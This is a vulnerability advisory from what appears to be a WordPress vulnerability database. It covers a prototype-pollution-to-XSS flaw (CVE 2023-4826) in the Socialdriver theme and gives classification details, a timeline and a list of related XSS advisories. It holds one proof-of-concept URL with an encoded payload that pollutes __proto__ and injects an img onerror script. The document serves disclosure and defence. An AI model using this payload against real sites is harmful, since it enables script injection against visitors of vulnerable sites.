Socialdriver < 2024 – Prototype Pollution to XSS | CVE 2023-4826 | Theme Vulnerabilities

Description

The theme has a prototype pollution vulnerability that could allow an attacker to inject arbitrary properties resulting in a cross-site scripting (XSS) attack.

Proof of Concept

Access the URL:

https://example.com/?__proto__%5BpreventDefault%5D=x&__proto__%5BhandleObj%5D=x&__proto__%5BdelegateTarget%5D=%3Cimg%2Fsrc%2Fonerror%3Dalert%281%29%3E

See the XSS resulting from prototype pollution

Affects Themes

Fixed in 2024

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Submitter

longxi

Verified

Yes

WPVDB ID

99ec0add-8f4d-4d68-91aa-80b1631a53bf

Timeline

Publicly Published

2023-09-11 (about 2 years ago)

Added

2023-09-11 (about 2 years ago)

Last Updated

2024-02-23 (about 1 year ago)

Other

Published

Title

Published

2025-01-07

Title

Video Embed Optimizer <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-12-11

Title

Travel Tour < 5.2.4 - Reflected XSS

Published

2023-12-19

Title

WooCommerce Menu Extension <= 1.6.2 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-05-09

Title

WordPress Gearside Developer Dashboard <= 1.0.72 - Reflected XSS

Published

2024-03-28

Title

Geo Controller < 8.6.5 - Authenticated (Contributor+) Stored Cross-Site Scripting